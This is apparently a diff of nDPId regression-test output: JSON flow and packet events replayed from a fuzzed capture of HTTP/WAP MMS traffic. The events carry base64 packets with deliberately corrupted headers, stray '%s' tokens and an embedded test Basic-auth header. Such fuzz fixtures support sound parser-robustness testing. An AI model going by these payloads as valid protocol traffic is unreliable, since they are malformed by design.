SmqTS8eSRtrYAQiJjP5kk8lcwBI1AgEHAoP2II8axveMUxCBBwKU3dDqfCKT69HlgQcGbBpzQqeNOKNF6oEwAEga4ImSmqwxRZQBFAp8rg96cDaFckq\/gRlAdboXdDfSI5Fhs4Eygrc660OMDBW5HaEBBsHdhiinThEsf5noAQbGQJaMx0Ha8dBdkAEbgqMCaJz67tCjYyGBFYKElgduY8Vu4Zy7gQiCozpdU1ad0ULON4ERAcMeDUZFTuMPjUeBCQG2xs90aDTRIjGIgQiCgWIMmeabddj5oQEHBPho51DgcHKVONABDMmMbh6HE7Qii8JIgQxKT03NTDED6MOAHwEACa6M6Mfl1xY4Ih2BG4p2Zgatr88WCLapAQAJndLPeWwjkERZqQEHCkMM4JXinkRKYxyBCMyCApUNjcVUeFBtAQpCgn4gisK1K1VbUYEGQr9sTV75X6826qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"} +00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17ACVzAJN8CABFAAXcQEtAAIAGVpasFAMFrBQDDSVzAFDlUj+tytsnNlAQInStCAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvES4xDQpIbnN0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29sdGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6INtwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLEFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCEFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdmVyc2lvbj0lcwAwIj8+PHpkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YSVzAHMjInhtbG5zOnByZj0iaHR0cDovL3d3VC53YXBmb291bS5vcmcvVUFQbk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb34gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhZz48cmRmOmxpPmFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkRzpCYWc+PC9wcmY6Q2NwcEFjY2VwdD5XL3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYtMjogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgcG18bnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbLVzOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMDQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT58ckhmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdC1DaGFyc2V0PjxyZGY6QmFnPjxyZGY6bGk+KjwvcmRmOmxpPjwvcmRmOkJhZz48L3ByZjpDY3BwQWNjZXB0LUNoYXJzZXQ+PC9yZGY6RGVzY3JpcHRpb24+PC9yZGY6UkRGPg0KNTYtUHJvZmlsZS1EaWZmLTM6IDw\/eG1sIHZlcnNpb249IjEuMCI\/PjxyZGY6UkRGIHhtbG5zOnJkZj1MaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyJ4bWxu
czpwcmY9Imh0dHA6L9x3d3cud2FwZm9CdW0ub3JnL1VBUFJPRi9jY3Bwc2NoZW1hLTE5OTkxMDE0IyI+PCEtLSBicm93c2VyIHZlbmRvciBzaXRlOiBEZWZhdWx0IGRlc2NyaXB0aW9uIG9mIHByb3BlcnRpZXMxLS0+PHJkZk5EZXNjcmlwdGlvbj48cHJmOkNjcHBB9mNlcHQtTGFuZ3VhZ2U+PHJkZjpTZXE+PHJkZjpsaT5lbjwvcmRiOmxpPjwvcmRmOlNlcT48L3ByZjpDY3BwQWNjZXB0LUxhbmd1YWdlPjwvcmRmOkRlc2NyaXB0OG9uPjwvcmRmOlJERj4NCjU2LVByb2ZpbGUJICJodHRwOi8vd2FwLnNvbnllcmljc3Nvbm1vYmlsZS5jb20vVUFwcm9mL1Q2OFI="} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"thread_ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854562488,"pkt":"AHWLk5N8CAAgsl17CABFAAAwxNVAAEAGF7isFAMNrBQDBc\/JAFDK5CpLAAAAAHACgyzcpwAAAQEEAgIEBbQ="} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562488,"pkt":"CAAgsl17AFCLk5N8CABFAAAsQ0tAAIAGWUasFAMFrBQjDQBQz5DlU6AgyuQqTGASIjjNHQAAAgQFtG4v"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"} +00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"thread_ts_msec":1031854562489,"pkt":"AFCLk5N8CAAgsl17CABFAANIxNhAAEAGFJ2sFAMNrEYDBc+QAFDK5CuI5VOgYVAYgyy9cwAALS1tc2dwYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0DQpDb250s250LVR5cGU6IGFwcGxpY2F0em9uk3htbA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz4NCjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIg0KICAgICAgICAgNmh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cCBwPg0KICA8cHVzaC1tZXNzYWdlIHB1dmgtaWQ9IjE4OTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5lWSIgZGVsaXZlci1iZWZvcmUtdGltZXN0YW1wPSIyMDAyLTA5LTEyVDE5OjE0OjQ4SiIgcHBnLW5vdGlmeS1yZXF1ZXN0ZWQtdG89Imh0dHA6Ly8xNzIuMjAuMy4xMytzZXJ2bGV0cy9tbXMiPg0KICAgITxhZGRyZXNzIGFkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcwNjEwMTAwNC9UWVBFPVBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KIDIgIDxxdWFsaXR5LW9mLXNlcnZpY2UgcHJpb3JpdHk9Im1lZGl1bSIgZGVsaXZlcnktbWV0aG9kPSJ1bmNvbmZpcm1lZCI+PC9xdWFsaXR5LW9mLSVzAHZpY2U+DQogIDwvdnVzaC1tZXNzYWdlPg0KPC9wYXA+DQoNCi0tbXNncGFydF8wXzEwWDhfMTAzMTg1NDU2MjQ4NA0KQ29udGVudC1UeXBlOi
BjcHBsaVdhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpYLWphcC1BcHBsaWNhdGlvbi1JZDogNA0KDR+Mho2QizE4OTMwMEBnZWNkczIubW9iaWxpdHlsYWIubmV0AJcrNDkxNzI2MTAxMDA0L1RZUEU9UExNTleFBD2A2eKVgQ0KLS1tc2dnYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0LS0="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562690,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562690,"pkt":"AFCLk5N8CAAgsl17CABFAAAobNpAAEAGF7usFEMNrBQDBc+QAFDK5C6o5VOhNFAQgyx+pAAA"} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1031854565447} 
00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854562790,"pkt":"CAAgsl17AFCLk5N8DABFJXMATUtAAIAGT0asFAMFrBQDDQowAFDlXnSjAABhAGACIAC1aQAAAgQFtCiq"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565447,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854565447,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"} 
-01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\/bi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS6wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElBICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2twZm9ydW0ub3JnL0RURC9wYXBfMS4wLrx0ZMA+CjxwYVM+CiAgPHJlc3VsdC5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1T2gtaWQ9IjFoOTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5ldCIgc2VuZGVyLWFkZHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFpZT0id2dwNCIgcmVjZWl2dmQtdGltcT0iNjAwMi0wOS0xMlQxODowMDowOVoiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTg6MDA6MTJaIiBtZXNzYWdlLXN0YXRlPSJkZWyDdmVyZWQiIGNvZGU9IjEwMDBYPgogICAgPGFkZHJlc3MgYWRkcu5zcy12YWx1ZUIiV0FQUFVTSD0rNDkxNzI2MTAxMDA0L1RZUEU9UExNTkAxNzIuMjAuMy41Ij48L2FkZHJlc3M+CiAgICA8cXVhbGl0eS1vZi1zZXJ2aWNlIGRlbGl2ZXJ5LW1ldGhvZD0idW5jb25maXJtZWR0IG5ldHdvcms9IkdTTSI+PC9xa2FsaXR5LW9mLXNlcnZpY2U+CiAgPC9yZXN1bHRub3RpZmljYXRpb24tbWVzc2FnZT4KPC9wYXA+"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": 
